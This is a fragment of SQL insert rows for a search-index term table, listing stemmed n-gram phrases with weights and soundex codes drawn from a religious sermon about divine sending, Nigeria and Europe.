(317561, 'go till next', 'go till next', 0, 1, 1.4, 'G34523', 1, '*'),
(317562, 'gobc', 'gobc', 0, 0, 0.2667, 'G120', 1, '*'),
(317563, 'gobc 2017', 'gobc 2017', 0, 1, 1.3, 'G120', 1, '*'),
(317564, 'gobc 2017 i', 'gobc 2017 i', 0, 1, 1.3667, 'G120', 1, '*'),
(317565, 'god came', 'god came', 0, 1, 1.2667, 'G325', 1, '*'),
(317566, 'god came to', 'god came to', 0, 1, 1.3667, 'G3253', 1, '*'),
(317567, 'god has come', 'god has come', 0, 1, 1.4, 'G325', 1, '*'),
(317568, 'god is sending', 'god is sending', 0, 1, 1.4667, 'G325352', 1, '*'),
(317569, 'god put', 'god put', 0, 1, 1.2333, 'G313', 1, '*'),
(317570, 'god put on', 'god put on', 0, 1, 1.3333, 'G3135', 1, '*'),
(317571, 'god sent', 'god sent', 0, 1, 1.2667, 'G3253', 1, '*'),
(317572, 'god sent me', 'god sent me', 0, 1, 1.3667, 'G32535', 1, '*'),
(317573, 'god they will', 'god they will', 0, 1, 1.4333, 'G340', 1, '*'),
(317574, 'god wants me', 'god wants me', 0, 1, 1.4, 'G35325', 2, '*'),
(317575, 'god\'s special', 'god special', 0, 1, 1.4333, 'G32124', 1, '*'),
(317576, 'god\'s special forces', 'god special forces', 0, 1, 1.6667, 'G32124162', 1, '*'),
(317577, 'got born', 'got born', 0, 1, 1.2667, 'G3165', 2, '*'),
(317578, 'got born again', 'got born again', 0, 1, 1.4667, 'G316525', 2, '*'),
(317579, 'got there', 'got there', 0, 1, 1.3, 'G360', 1, '*'),
(317580, 'got there people', 'got there people', 0, 1, 1.5333, 'G3614', 1, '*'),
(317581, 'grace of', 'grace of', 0, 1, 1.2667, 'G621', 1, '*'),
(317582, 'grace of their', 'grace of their', 0, 1, 1.4667, 'G62136', 1, '*'),
(317583, 'had an', 'had an', 0, 1, 1.2, 'H350', 2, '*'),
(317584, 'had an encounter', 'had an encounter', 0, 1, 1.5333, 'H352536', 1, '*'),
(317585, 'had been done', 'had been done', 0, 1, 1.4333, 'H31535', 1, '*'),
(317586, 'happenings', 'happen', 0, 0, 0.6667, 'H152', 1, '*'),
(317587, 'happenings that', 'happen that', 0, 1, 1.5, 'H1523', 1, '*'),
(317588, 'happenings that call', 'happen that call', 0, 1, 1.6667, 'H152324', 1, '*'),
(317589, 'has a message', 'ha a message', 0, 1, 1.4333, 'H252', 1, '*'),
(317590, 'has called and', 'ha called and', 0, 1, 1.4667, 'H24353', 1, '*'),
(317591, 'has come', 'ha come', 0, 1, 1.2667, 'H250', 1, '*'),
(317592, 'has come to', 'ha come to', 0, 1, 1.3667, 'H253', 1, '*'),
(317593, 'has placed them', 'ha placed them', 0, 1, 1.5, 'H214235', 1, '*'),
(317594, 'has taken', 'ha taken', 0, 1, 1.3, 'H2325', 1, '*'),
(317595, 'has taken over', 'ha taken over', 0, 1, 1.4667, 'H232516', 1, '*'),
(317596, 'have been equipped', 'have been equipped', 0, 1, 1.6, 'H15213', 1, '*'),
(317597, 'have had an', 'have had an', 0, 1, 1.3667, 'H135', 1, '*'),
(317598, 'have stirred', 'have stirred', 0, 1, 1.4, 'H12363', 1, '*'),
(317599, 'have stirred up', 'have stirred up', 0, 1, 1.5, 'H123631', 1, '*'),
(317600, 'have stopped', 'have stopped', 0, 1, 1.4, 'H12313', 1, '*'),
(317601, 'have stopped watching', 'have stopped watching', 0, 1, 1.7, 'H12313252', 1, '*'),
(317602, 'he came', 'he came', 0, 1, 1.2333, 'H250', 1, '*'),
(317603, 'he came to', 'he came to', 0, 1, 1.3333, 'H253', 1, '*'),
(317604, 'he equips', 'he equips', 0, 1, 1.3, 'H212', 1, '*'),
(317605, 'he equips you', 'he equips you', 0, 1, 1.4333, 'H212', 1, '*'),
(317606, 'he has called', 'he has called', 0, 1, 1.4333, 'H243', 1, '*'),
(317607, 'he reckons', 'he reckons', 0, 1, 1.3333, 'H6252', 1, '*'),
(317608, 'he reckons with', 'he reckons with', 0, 1, 1.5, 'H62523', 1, '*'),
(317609, 'he sends', 'he sends', 0, 1, 1.2667, 'H2532', 1, '*'),
(317610, 'he sends you', 'he sends you', 0, 1, 1.4, 'H2532', 1, '*'),
(317611, 'he showed', 'he showed', 0, 1, 1.3, 'H230', 1, '*'),
(317612, 'he showed me', 'he showed me', 0, 1, 1.4, 'H235', 1, '*'),
(317613, 'hear you', 'hear you', 0, 1, 1.2667, 'H600', 1, '*'),
(317614, 'hear you say', 'hear you say', 0, 1, 1.4, 'H620', 1, '*'),
(317615, 'heart 13', 'heart 13', 0, 1, 1.2667, 'H630', 1, '*'),
(317616, 'heart 13 08', 'heart 13 08', 0, 1, 1.3667, 'H630', 1, '*'),
(317617, 'heart dearly', 'heart dearly', 0, 1, 1.4, 'H6364', 1, '*'),
(317618, 'heart dearly beloved', 'heart dearly beloved', 0, 1, 1.6667, 'H63641413', 1, '*'),
(317619, 'himself he', 'himself he', 0, 1, 1.3333, 'H5241', 1, '*'),
(317620, 'himself he has', 'himself he has', 0, 1, 1.4667, 'H52412', 1, '*'),
(317621, 'his family', 'hi family', 0, 1, 1.3333, 'H2154', 1, '*'),
(317622, 'his family some', 'hi family some', 0, 1, 1.5, 'H215425', 1, '*'),
(317623, 'his glory', 'hi glory', 0, 1, 1.3, 'H246', 1, '*'),
(317624, 'his glory will', 'hi glory will', 0, 1, 1.4667, 'H2464', 1, '*'),
(317625, 'his people whom', 'hi people whom', 0, 1, 1.5, 'H2145', 1, '*'),
(317626, 'how bad', 'how bad', 0, 1, 1.2333, 'H130', 1, '*'),
(317627, 'how bad the', 'how bad the', 0, 1, 1.3667, 'H130', 1, '*'),
(317628, 'how could', 'how could', 0, 1, 1.3, 'H243', 1, '*'),
(317629, 'how could young', 'how could young', 0, 1, 1.5, 'H24352', 1, '*'),
(317630, 'how things', 'how things', 0, 1, 1.3333, 'H352', 1, '*'),
(317631, 'how things had', 'how things had', 0, 1, 1.4667, 'H3523', 1, '*'),
(317632, 'human being is', 'human being is', 0, 1, 1.4667, 'H5152', 1, '*'),
(317633, 'i am sending', 'i am sending', 0, 1, 1.4, 'I525352', 1, '*'),
(317634, 'i challenge', 'i challenge', 0, 1, 1.3667, 'I2452', 1, '*'),
(317635, 'i challenge you', 'i challenge you', 0, 1, 1.5, 'I2452', 1, '*'),
(317636, 'i divine', 'i divine', 0, 1, 1.2667, 'I315', 1, '*'),
(317637, 'i divine delegates', 'i divine delegates', 0, 1, 1.6, 'I31534232', 1, '*'),
(317638, 'i faced', 'i faced', 0, 1, 1.2333, 'I123', 1, '*'),
(317639, 'i faced serious', 'i faced serious', 0, 1, 1.5, 'I123262', 1, '*'),
(317640, 'i got born', 'i got born', 0, 1, 1.3333, 'I23165', 1, '*'),
(317641, 'i obeyed and', 'i obeyed and', 0, 1, 1.4, 'I1353', 1, '*'),
(317642, 'i send me', 'i send me', 0, 1, 1.3, 'I2535', 1, '*'),
(317643, 'i send me.”', 'i send me.”', 0, 1, 1.3667, 'I2535', 1, '*'),
(317644, 'i started the', 'i started the', 0, 1, 1.4333, 'I2363', 1, '*'),
(317645, 'i told them', 'i told them', 0, 1, 1.3667, 'I3435', 1, '*'),
(317646, 'i took', 'i took', 0, 1, 1.2, 'I320', 1, '*'),
(317647, 'i took over', 'i took over', 0, 1, 1.3667, 'I3216', 1, '*'),
(317648, 'i was minding', 'i was minding', 0, 1, 1.4333, 'I25352', 1, '*'),
(317649, 'if he sends', 'if he sends', 0, 1, 1.3667, 'I12532', 1, '*'),
(317650, 'ii god\'s', 'ii god', 0, 1, 1.2667, 'I232', 1, '*'),
(317651, 'ii god\'s special', 'ii god special', 0, 1, 1.5333, 'I232124', 1, '*'),
(317652, 'iii a', 'iii a', 0, 1, 1.1667, 'I000', 1, '*'),
(317653, 'iii a sent', 'iii a sent', 0, 1, 1.3333, 'I253', 1, '*'),
(317654, 'ijeshaland', 'ijeshaland', 0, 0, 0.6667, 'I2453', 1, '*'),
(317655, 'ijeshaland a', 'ijeshaland a', 0, 1, 1.4, 'I2453', 1, '*'),
(317656, 'ijeshaland a town', 'ijeshaland a town', 0, 1, 1.5667, 'I24535', 1, '*'),
(317657, 'in a land', 'in a land', 0, 1, 1.3, 'I5453', 1, '*'),
(317658, 'in europe', 'in europe', 0, 1, 1.3, 'I561', 1, '*'),
(317659, 'in europe and', 'in europe and', 0, 1, 1.4333, 'I56153', 1, '*'),
(317660, 'in osun', 'in osun', 0, 1, 1.2333, 'I525', 1, '*'),
(317661, 'in osun state', 'in osun state', 0, 1, 1.4333, 'I52523', 1, '*'),
(317662, 'in our world', 'in our world', 0, 1, 1.4, 'I5643', 1, '*'),
(317663, 'in the next', 'in the next', 0, 1, 1.3667, 'I53523', 1, '*'),
(317664, 'in the u', 'in the u', 0, 1, 1.2667, 'I530', 1, '*'),
(317665, 'influence the world', 'influenc the world', 0, 1, 1.6333, 'I514523643', 1, '*'),
(317666, 'intellectuals', 'intellectu', 0, 0, 0.8667, 'I5342342', 1, '*'),
(317667, 'intellectuals he', 'intellectu he', 0, 1, 1.5333, 'I5342342', 1, '*'),
(317668, 'intellectuals he will', 'intellectu he will', 0, 1, 1.7, 'I53423424', 1, '*'),
(317669, 'is a breakdown', 'is a breakdown', 0, 1, 1.4667, 'I216235', 1, '*'),
(317670, 'is a power', 'is a power', 0, 1, 1.3333, 'I216', 1, '*'),
(317671, 'is asking who', 'is asking who', 0, 1, 1.4333, 'I252', 1, '*'),
(317672, 'is how bad', 'is how bad', 0, 1, 1.3333, 'I213', 1, '*'),
(317673, 'is if', 'is if', 0, 1, 1.1667, 'I210', 1, '*'),
(317674, 'is if you', 'is if you', 0, 1, 1.3, 'I210', 1, '*'),
(317675, 'is sendable', 'is sendable', 0, 1, 1.3667, 'I25314', 1, '*'),
(317676, 'is sendable i', 'is sendable i', 0, 1, 1.4333, 'I25314', 1, '*'),
(317677, 'is sending', 'is sending', 0, 1, 1.3333, 'I25352', 1, '*'),
(317678, 'is sending you', 'is sending you', 0, 1, 1.4667, 'I25352', 1, '*'),
(317679, 'isaiah 6 verse', 'isaiah 6 verse', 0, 1, 1.4667, 'I2162', 1, '*'),
(317680, 'item 57', 'item 57', 0, 1, 1.2333, 'I350', 1, '*'),
(317681, 'item 57 are', 'item 57 are', 0, 1, 1.3667, 'I356', 1, '*'),
(317682, 'jesus many', 'jesu many', 0, 1, 1.3333, 'J500', 1, '*'),
(317683, 'jesus many people', 'jesu many people', 0, 1, 1.5667, 'J514', 1, '*'),
(317684, 'just that', 'just that', 0, 1, 1.3, 'J300', 1, '*'),
(317685, 'just that he', 'just that he', 0, 1, 1.4, 'J300', 1, '*'),
(317686, 'k', 'k', 0, 0, 0.0667, 'K000', 1, '*'),
(317687, 'k of', 'k of', 0, 1, 1.1333, 'K100', 1, '*'),
(317688, 'k of today', 'k of today', 0, 1, 1.3333, 'K130', 1, '*'),
(317689, 'k2 item 57', 'k2 item 57', 0, 1, 1.3333, 'K350', 1, '*'),
(317690, 'labels', 'label', 0, 0, 0.4, 'L142', 1, '*'),
(317691, 'labels god', 'label god', 0, 1, 1.3333, 'L1423', 1, '*'),
(317692, 'labels god put', 'label god put', 0, 1, 1.4667, 'L142313', 1, '*'),
(317693, 'land have', 'land have', 0, 1, 1.3, 'L531', 1, '*'),
(317694, 'land have stopped', 'land have stopped', 0, 1, 1.5667, 'L5312313', 1, '*'),
(317695, 'land he', 'land he', 0, 1, 1.2333, 'L530', 1, '*'),
(317696, 'land he reckons', 'land he reckons', 0, 1, 1.5, 'L536252', 1, '*'),
(317697, 'land the watchmen', 'land the watchmen', 0, 1, 1.5667, 'L5325', 1, '*'),
(317698, 'land where god', 'land where god', 0, 1, 1.4667, 'L53623', 1, '*'),
(317699, 'law and', 'law and', 0, 1, 1.2333, 'L530', 1, '*'),
(317700, 'law and order', 'law and order', 0, 1, 1.4333, 'L53636', 1, '*'),
(317701, 'leave the', 'leav the', 0, 1, 1.3, 'L130', 1, '*'),
(317702, 'leave the church', 'leav the church', 0, 1, 1.5333, 'L13262', 1, '*'),
(317703, 'let the lord', 'let the lord', 0, 1, 1.4, 'L3463', 1, '*'),
(317704, 'like us', 'like us', 0, 1, 1.2333, 'L200', 1, '*'),
(317705, 'like us come', 'like us come', 0, 1, 1.4, 'L250', 1, '*'),
(317706, 'longer an', 'longer an', 0, 1, 1.3, 'L5265', 1, '*'),
(317707, 'longer an ordinary', 'longer an ordinary', 0, 1, 1.6, 'L52656356', 1, '*'),
(317708, 'looking for somebody', 'look for somebody', 0, 1, 1.6667, 'L252162513', 1, '*'),
(317709, 'lord came to', 'lord came to', 0, 1, 1.4, 'L63253', 1, '*'),
(317710, 'lord hear', 'lord hear', 0, 1, 1.3, 'L636', 1, '*'),
(317711, 'lord hear you', 'lord hear you', 0, 1, 1.4333, 'L636', 1, '*'),
(317712, 'lord one', 'lord one', 0, 1, 1.2667, 'L635', 1, '*'),
(317713, 'lord one of', 'lord one of', 0, 1, 1.3667, 'L6351', 1, '*'),
(317714, 'lord today', 'lord today', 0, 1, 1.3333, 'L630', 1, '*'),
(317715, 'lord today here', 'lord today here', 0, 1, 1.5, 'L636', 1, '*'),
(317716, 'make yourself', 'make yourself', 0, 1, 1.4333, 'M26241', 1, '*'),
(317717, 'make yourself one', 'make yourself one', 0, 1, 1.5667, 'M262415', 1, '*'),
(317718, 'man didn\'t', 'man didn', 0, 1, 1.3333, 'M353', 1, '*'),
(317719, 'man didn\'t send', 'man didn send', 0, 1, 1.5, 'M353253', 1, '*'),
(317720, 'man except', 'man except', 0, 1, 1.3333, 'M213', 1, '*'),
(317721, 'man except you', 'man except you', 0, 1, 1.4667, 'M213', 1, '*'),
(317722, 'man in the', 'man in the', 0, 1, 1.3333, 'M300', 1, '*'),
(317723, 'man you must', 'man you must', 0, 1, 1.4, 'M230', 1, '*'),
(317724, 'mandate god', 'mandat god', 0, 1, 1.3667, 'M323', 1, '*'),
(317725, 'mandate god is', 'mandat god is', 0, 1, 1.4667, 'M3232', 1, '*'),
(317726, 'many people do', 'mani people do', 0, 1, 1.4667, 'M143', 1, '*'),
(317727, 'me a', 'me a', 0, 1, 1.1333, 'M000', 2, '*'),
(317728, 'me a sent', 'me a sent', 0, 1, 1.3, 'M253', 1, '*'),
(317729, 'me and', 'me and', 0, 1, 1.2, 'M300', 2, '*'),
(317730, 'me and said', 'me and said', 0, 1, 1.3667, 'M323', 1, '*'),
(317731, 'me back', 'me back', 0, 1, 1.2333, 'M120', 1, '*'),
(317732, 'me back to', 'me back to', 0, 1, 1.3333, 'M123', 1, '*'),
(317733, 'me is', 'me is', 0, 1, 1.1667, 'M200', 1, '*'),
(317734, 'me is if', 'me is if', 0, 1, 1.2667, 'M210', 1, '*'),
(317735, 'me let', 'me let', 0, 1, 1.2, 'M430', 1, '*'),
(317736, 'me let the', 'me let the', 0, 1, 1.3333, 'M430', 1, '*'),
(317737, 'me the', 'me the', 0, 1, 1.2, 'M300', 1, '*'),
(317738, 'me the revelation', 'me the revelation', 0, 1, 1.5667, 'M361435', 1, '*'),
(317739, 'me to ask', 'me to ask', 0, 1, 1.3, 'M320', 1, '*'),
(317740, 'men for example', 'men for example', 0, 1, 1.5, 'M162514', 1, '*'),
(317741, 'men isaiah', 'men isaiah', 0, 1, 1.3333, 'M200', 1, '*'),
(317742, 'men isaiah 6', 'men isaiah 6', 0, 1, 1.4, 'M200', 1, '*'),
(317743, 'men that', 'men that', 0, 1, 1.2667, 'M300', 2, '*'),
(317744, 'men that are', 'men that are', 0, 1, 1.4, 'M360', 1, '*'),
(317745, 'message', 'messag', 0, 0, 0.4667, 'M200', 2, '*'),
(317746, 'message a', 'messag a', 0, 1, 1.3, 'M200', 1, '*'),
(317747, 'message a sender', 'messag a sender', 0, 1, 1.5333, 'M2536', 1, '*'),
(317748, 'minding my', 'mind my', 0, 1, 1.3333, 'M3525', 1, '*'),
(317749, 'minding my business', 'mind my business', 0, 1, 1.6333, 'M35251252', 1, '*'),
(317750, 'ministry but i', 'ministri but i', 0, 1, 1.4667, 'M23613', 1, '*'),
(317751, 'more muslims', 'more muslims', 0, 1, 1.4, 'M652452', 1, '*'),
(317752, 'more muslims than', 'more muslims than', 0, 1, 1.5667, 'M65245235', 1, '*'),
(317753, 'muhammad', 'muhammad', 0, 0, 0.5333, 'M300', 1, '*'),
(317754, 'muhammad gaddafi', 'muhammad gaddafi', 0, 1, 1.5333, 'M3231', 1, '*'),
(317755, 'muhammad gaddafi said', 'muhammad gaddafi said', 0, 1, 1.7, 'M323123', 1, '*'),
(317756, 'muslims', 'muslim', 0, 0, 0.4667, 'M2452', 1, '*'),
(317757, 'muslims than', 'muslim than', 0, 1, 1.4, 'M245235', 1, '*'),
(317758, 'muslims than christians', 'muslim than christians', 0, 1, 1.7667, 'M245235262352', 1, '*'),
(317759, 'my anger', 'my anger', 0, 1, 1.2667, 'M260', 1, '*'),
(317760, 'my anger through', 'my anger through', 0, 1, 1.5333, 'M26362', 1, '*'),
(317761, 'my business', 'my business', 0, 1, 1.3667, 'M1252', 1, '*'),
(317762, 'my business planning', 'my business planning', 0, 1, 1.6667, 'M12521452', 1, '*'),
(317763, 'my family', 'my family', 0, 1, 1.3, 'M154', 1, '*'),
(317764, 'my family and', 'my family and', 0, 1, 1.4333, 'M15453', 1, '*'),
(317765, 'need to fire', 'need to fire', 0, 1, 1.4, 'N316', 1, '*'),
(317766, 'new turn', 'new turn', 0, 1, 1.2667, 'N365', 1, '*'),
(317767, 'new turn because', 'new turn because', 0, 1, 1.5333, 'N36512', 1, '*'),
(317768, 'next 20-30', 'next 20-30', 0, 1, 1.3333, 'N230', 1, '*'),
(317769, 'next 20-30 years', 'next 20-30 years', 0, 1, 1.5333, 'N2362', 1, '*'),
(317770, 'nigeria to', 'nigeria to', 0, 1, 1.3333, 'N263', 1, '*'),
(317771, 'nigeria to rescue', 'nigeria to rescue', 0, 1, 1.5667, 'N26362', 1, '*'),
(317772, 'no longer an', 'no longer an', 0, 1, 1.4, 'N45265', 1, '*'),
(317773, 'not every', 'not every', 0, 1, 1.3, 'N316', 2, '*'),
(317774, 'not every human', 'not every human', 0, 1, 1.5, 'N3165', 1, '*'),
(317775, 'not just that', 'not just that', 0, 1, 1.4333, 'N323', 1, '*'),
(317776, 'not need', 'not need', 0, 1, 1.2667, 'N353', 1, '*'),
(317777, 'not need to', 'not need to', 0, 1, 1.3667, 'N353', 1, '*'),
(317778, 'not reckon', 'not reckon', 0, 1, 1.3333, 'N3625', 1, '*'),
(317779, 'not reckon with', 'not reckon with', 0, 1, 1.5, 'N36253', 1, '*'),
(317780, 'not understand', 'not understand', 0, 1, 1.4667, 'N35362353', 1, '*'),
(317781, 'not understand the', 'not understand the', 0, 1, 1.6, 'N35362353', 1, '*'),
(317782, 'now go', 'now go', 0, 1, 1.2, 'N200', 1, '*'),
(317783, 'now go till', 'now go till', 0, 1, 1.3667, 'N234', 1, '*'),
(317784, 'obeyed and went', 'obei and went', 0, 1, 1.5, 'O135353', 1, '*'),
(317785, 'occultic practices', 'occult practices', 0, 1, 1.6, 'O243216232', 1, '*'),
(317786, 'occultic practices over', 'occult practices over', 0, 1, 1.7667, 'O24321623216', 1, '*'),
(317787, 'of a sent', 'of a sent', 0, 1, 1.3, 'O1253', 1, '*'),
(317788, 'of electronics', 'of electronics', 0, 1, 1.4667, 'O1423652', 1, '*'),
(317789, 'of electronics when', 'of electronics when', 0, 1, 1.6333, 'O14236525', 1, '*'),
(317790, 'of his glory', 'of his glory', 0, 1, 1.4, 'O1246', 1, '*'),
(317791, 'of intellectuals', 'of intellectuals', 0, 1, 1.5333, 'O15342342', 1, '*'),
(317792, 'of intellectuals he', 'of intellectuals he', 0, 1, 1.6333, 'O15342342', 1, '*'),
(317793, 'of law', 'of law', 0, 1, 1.2, 'O140', 1, '*'),
(317794, 'of law and', 'of law and', 0, 1, 1.3333, 'O1453', 1, '*'),
(317795, 'of my family', 'of my family', 0, 1, 1.4, 'O15154', 1, '*'),
(317796, 'of sending', 'of sending', 0, 1, 1.3333, 'O125352', 1, '*'),
(317797, 'of sending that', 'of sending that', 0, 1, 1.5, 'O1253523', 1, '*'),
(317798, 'of the sendable', 'of the sendable', 0, 1, 1.5, 'O1325314', 1, '*'),
(317799, 'of the things', 'of the things', 0, 1, 1.4333, 'O1352', 2, '*'),
(317800, 'of their god', 'of their god', 0, 1, 1.4, 'O13623', 1, '*'),
(317801, 'of this from', 'of this from', 0, 1, 1.4, 'O132165', 1, '*'),
(317802, 'of today', 'of today', 0, 1, 1.2667, 'O130', 1, '*'),
(317803, 'of today for', 'of today for', 0, 1, 1.4, 'O1316', 1, '*'),
(317804, 'of who', 'of who', 0, 1, 1.2, 'O100', 1, '*'),
(317805, 'of who sent', 'of who sent', 0, 1, 1.3667, 'O1253', 1, '*'),
(317806, 'of you god', 'of you god', 0, 1, 1.3333, 'O123', 1, '*'),
(317807, 'office', 'offic', 0, 0, 0.4, 'O120', 1, '*'),
(317808, 'office your', 'offic your', 0, 1, 1.3667, 'O126', 1, '*'),
(317809, 'office your vicinity', 'offic your vicinity', 0, 1, 1.6667, 'O1261253', 1, '*'),
(317810, 'on thingstook', 'on thingstook', 0, 1, 1.4333, 'O535232', 1, '*'),
(317811, 'on thingstook a', 'on thingstook a', 0, 1, 1.5, 'O535232', 1, '*'),
(317812, 'on you at', 'on you at', 0, 1, 1.3, 'O530', 1, '*'),
(317813, 'one there', 'on there', 0, 1, 1.3, 'O536', 1, '*'),
(317814, 'one there is', 'on there is', 0, 1, 1.4, 'O5362', 1, '*'),
(317815, 'one who sent', 'on who sent', 0, 1, 1.4, 'O5253', 1, '*'),
(317816, 'only way you', 'onli way you', 0, 1, 1.4, 'O540', 1, '*'),
(317817, 'oppositions', 'opposit', 0, 0, 0.7333, 'O12352', 1, '*'),
(317818, 'oppositions when', 'opposit when', 0, 1, 1.5333, 'O123525', 1, '*'),
(317819, 'oppositions when i', 'opposit when i', 0, 1, 1.6, 'O123525', 1, '*'),
(317820, 'order in', 'order in', 0, 1, 1.2667, 'O6365', 1, '*'),
(317821, 'order in a', 'order in a', 0, 1, 1.3333, 'O6365', 1, '*'),
(317822, 'ordinary man', 'ordinari man', 0, 1, 1.4, 'O63565', 1, '*'),
(317823, 'ordinary man except', 'ordinari man except', 0, 1, 1.6333, 'O63565213', 1, '*'),
(317824, 'osun', 'osun', 0, 0, 0.2667, 'O250', 2, '*'),
(317825, 'osun state', 'osun state', 0, 1, 1.3333, 'O2523', 2, '*'),
(317826, 'osun state nigeria', 'osun state nigeria', 0, 1, 1.6, 'O2523526', 1, '*'),
(317827, 'our world', 'our world', 0, 1, 1.3, 'O643', 1, '*'),
(317828, 'our world today', 'our world today', 0, 1, 1.5, 'O643', 1, '*'),
(317829, 'over and from', 'over and from', 0, 1, 1.4333, 'O1653165', 1, '*'),
(317830, 'over europe', 'over europe', 0, 1, 1.3667, 'O161', 1, '*'),
(317831, 'over europe in', 'over europe in', 0, 1, 1.4667, 'O1615', 1, '*'),
(317832, 'over in', 'over in', 0, 1, 1.2333, 'O165', 1, '*'),
(317833, 'over in europe', 'over in europe', 0, 1, 1.4667, 'O16561', 1, '*'),
(317834, 'over the land', 'over the land', 0, 1, 1.4333, 'O163453', 1, '*'),
(317835, 'over the town', 'over the town', 0, 1, 1.4333, 'O1635', 1, '*'),
(317836, 'over the years”', 'over the years”', 0, 1, 1.5, 'O16362', 1, '*'),
(317837, 'overcome me', 'overcom me', 0, 1, 1.3667, 'O1625', 1, '*'),
(317838, 'overcome me is', 'overcom me is', 0, 1, 1.4667, 'O16252', 1, '*'),
(317839, 'overcome the', 'overcom the', 0, 1, 1.4, 'O16253', 1, '*'),
(317840, 'overcome the one', 'overcom the one', 0, 1, 1.5333, 'O162535', 1, '*'),
(317841, 'part of the', 'part of the', 0, 1, 1.3667, 'P6313', 1, '*'),
(317842, 'people do', 'peopl do', 0, 1, 1.3, 'P430', 1, '*'),
(317843, 'people do not', 'peopl do not', 0, 1, 1.4333, 'P4353', 1, '*'),
(317844, 'people like', 'peopl like', 0, 1, 1.3667, 'P420', 1, '*'),
(317845, 'people like us', 'peopl like us', 0, 1, 1.4667, 'P420', 1, '*'),
(317846, 'people were', 'peopl were', 0, 1, 1.3667, 'P460', 1, '*'),
(317847, 'people were wondering', 'peopl were wondering', 0, 1, 1.7, 'P4653652', 1, '*'),
(317848, 'people whom', 'peopl whom', 0, 1, 1.3667, 'P450', 1, '*'),
(317849, 'people whom he', 'peopl whom he', 0, 1, 1.4667, 'P450', 1, '*'),
(317850, 'people whose', 'peopl whose', 0, 1, 1.4, 'P420', 1, '*'),
(317851, 'people whose ancestors', 'peopl whose ancestors', 0, 1, 1.7333, 'P4252362', 1, '*'),
(317852, 'place i', 'place i', 0, 1, 1.2333, 'P420', 1, '*'),
(317853, 'place i faced', 'place i faced', 0, 1, 1.4333, 'P42123', 1, '*'),
(317854, 'placed them', 'place them', 0, 1, 1.3667, 'P4235', 1, '*'),
(317855, 'placed them god', 'place them god', 0, 1, 1.5, 'P423523', 1, '*'),
(317856, 'planning', 'plan', 0, 0, 0.5333, 'P452', 1, '*'),
(317857, 'planning to', 'plan to', 0, 1, 1.3667, 'P4523', 1, '*'),
(317858, 'planning to become', 'plan to become', 0, 1, 1.6, 'P4523125', 1, '*'),
(317859, 'point on thingstook', 'point on thingstook', 0, 1, 1.6333, 'P53535232', 1, '*'),
(317860, 'politicians', 'politician', 0, 0, 0.7333, 'P43252', 1, '*'),
(317861, 'politicians in', 'politician in', 0, 1, 1.4667, 'P432525', 1, '*'),
(317862, 'politicians in the', 'politician in the', 0, 1, 1.6, 'P4325253', 1, '*'),
(317863, 'power of a', 'power of a', 0, 1, 1.3333, 'P610', 1, '*'),
(317864, 'power of sending', 'power of sending', 0, 1, 1.5333, 'P6125352', 1, '*'),
(317865, 'practices over', 'practic over', 0, 1, 1.4667, 'P623216', 1, '*'),
(317866, 'practices over the', 'practic over the', 0, 1, 1.6, 'P6232163', 1, '*'),
(317867, 'professor', 'professor', 0, 0, 0.6, 'P6126', 1, '*'),
(317868, 'professor of', 'professor of', 0, 1, 1.4, 'P61261', 1, '*'),
(317869, 'professor of electronics', 'professor of electronics', 0, 1, 1.8, 'P61261423652', 1, '*'),
(317870, 'put on you', 'put on you', 0, 1, 1.3333, 'P350', 1, '*'),
(317871, 'reckon', 'reckon', 0, 0, 0.4, 'R250', 1, '*'),
(317872, 'reckon with', 'reckon with', 0, 1, 1.3667, 'R253', 1, '*'),
(317873, 'reckon with the', 'reckon with the', 0, 1, 1.5, 'R253', 1, '*'),
(317874, 'reckons', 'reckon', 0, 0, 0.4667, 'R252', 1, '*'),
(317875, 'reckons with', 'reckon with', 0, 1, 1.4, 'R2523', 1, '*'),
(317876, 'reckons with his', 'reckon with his', 0, 1, 1.5333, 'R25232', 1, '*'),
(317877, 'recruit', 'recruit', 0, 0, 0.4667, 'R263', 1, '*'),
(317878, 'recruit the', 'recruit the', 0, 1, 1.3667, 'R263', 1, '*'),
(317879, 'recruit the carriers', 'recruit the carriers', 0, 1, 1.6667, 'R263262', 1, '*'),
(317880, 'rescue', 'rescu', 0, 0, 0.4, 'R200', 1, '*'),
(317881, 'rescue young', 'rescu young', 0, 1, 1.4, 'R252', 1, '*'),
(317882, 'rescue young people', 'rescu young people', 0, 1, 1.6333, 'R25214', 1, '*'),
(317883, 'revelation of', 'revel of', 0, 1, 1.4333, 'R14351', 1, '*'),
(317884, 'revelation of my', 'revel of my', 0, 1, 1.5333, 'R143515', 1, '*'),
(317885, 's heart 13', 's heart 13', 0, 1, 1.3333, 'S630', 1, '*'),
(317886, 'said i am', 'said i am', 0, 1, 1.3, 'S350', 1, '*'),
(317887, 'said “by', 'said “by', 0, 1, 1.2667, 'S310', 1, '*'),
(317888, 'said “by the', 'said “by the', 0, 1, 1.4, 'S313', 1, '*'),
(317889, 'say that', 'sai that', 0, 1, 1.2667, 'S300', 1, '*'),
(317890, 'say that in', 'sai that in', 0, 1, 1.3667, 'S350', 1, '*'),
(317891, 'says also', 'sai also', 0, 1, 1.3, 'S420', 1, '*'),
(317892, 'says also i', 'sai also i', 0, 1, 1.3667, 'S420', 1, '*'),
(317893, 'send himself', 'send himself', 0, 1, 1.4, 'S535241', 1, '*'),
(317894, 'send himself he', 'send himself he', 0, 1, 1.5, 'S535241', 1, '*'),
(317895, 'send me', 'send me', 0, 1, 1.2333, 'S535', 1, '*'),
(317896, 'send me let', 'send me let', 0, 1, 1.3667, 'S53543', 1, '*'),
(317897, 'send me.”', 'send me.”', 0, 1, 1.3, 'S535', 1, '*'),
(317898, 'send not', 'send not', 0, 1, 1.2667, 'S5353', 1, '*'),
(317899, 'send not every', 'send not every', 0, 1, 1.4667, 'S535316', 1, '*'),
(317900, 'sendable', 'sendabl', 0, 0, 0.5333, 'S5314', 1, '*'),
(317901, 'sendable are', 'sendabl are', 0, 1, 1.4, 'S53146', 1, '*'),
(317902, 'sendable are those', 'sendabl are those', 0, 1, 1.6, 'S5314632', 1, '*'),
(317903, 'sendable from', 'sendabl from', 0, 1, 1.4333, 'S5314165', 1, '*'),
(317904, 'sendable from our', 'sendabl from our', 0, 1, 1.5667, 'S53141656', 1, '*'),
(317905, 'sendable i', 'sendabl i', 0, 1, 1.3333, 'S5314', 1, '*'),
(317906, 'sendable i was', 'sendabl i was', 0, 1, 1.4667, 'S53142', 1, '*'),
(317907, 'sendable men', 'sendabl men', 0, 1, 1.4, 'S53145', 1, '*'),
(317908, 'sendable men for', 'sendabl men for', 0, 1, 1.5333, 'S5314516', 1, '*'),
